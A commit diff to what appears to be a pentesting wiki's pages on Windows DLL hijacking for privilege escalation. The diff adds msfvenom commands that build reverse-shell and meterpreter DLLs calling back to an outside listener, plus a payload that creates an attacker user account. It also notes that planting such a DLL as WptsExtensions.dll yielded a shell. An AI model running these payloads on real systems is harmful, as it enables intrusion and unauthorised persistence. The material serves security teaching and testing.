GITBOOK-3807: No subject

windows-hardening/windows-local-privilege-escalation/dll-hijacking.md

@@ -140,13 +140,19 @@ With the tool **** [**DLLirant**](https://github.com/redteamsocietegenerale/DLLi
 
 ### **Meterpreter**
 
-**Get a reverse shell:**
+**Get rev shell (x64):**
+
+```bash
+msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
+```
+
+**Get a meterpreter (x86):**
 
 ```bash
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
 ```
 
-**Create a user:**
+**Create a user (x86 I didn't see a x64 version):**
 
 ```
 msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll

windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md

@@ -88,7 +88,7 @@ However, that user has the **`seImpersonate`** privilege, so you can use the[ **
 
 At the moment of writing the **Task Scheduler** service is run with **Nt AUTHORITY\SYSTEM**.
 
-Having **generated the malicious Dll**, save it in the writable System Path with the name **WptsExtensions.dll** and **restart** the computer (or restart the service or do whatever it takes to rerun the affected service/program).
+Having **generated the malicious Dll** (in my case I used x64 rev shell and I got a shell back), save it in the writable System Path with the name **WptsExtensions.dll** and **restart** the computer (or restart the service or do whatever it takes to rerun the affected service/program).
 
 When the service is re-started, the **dll should be loaded and executed** (you can **reuse** the **procmon** trick to check if the **library was loaded as expected**).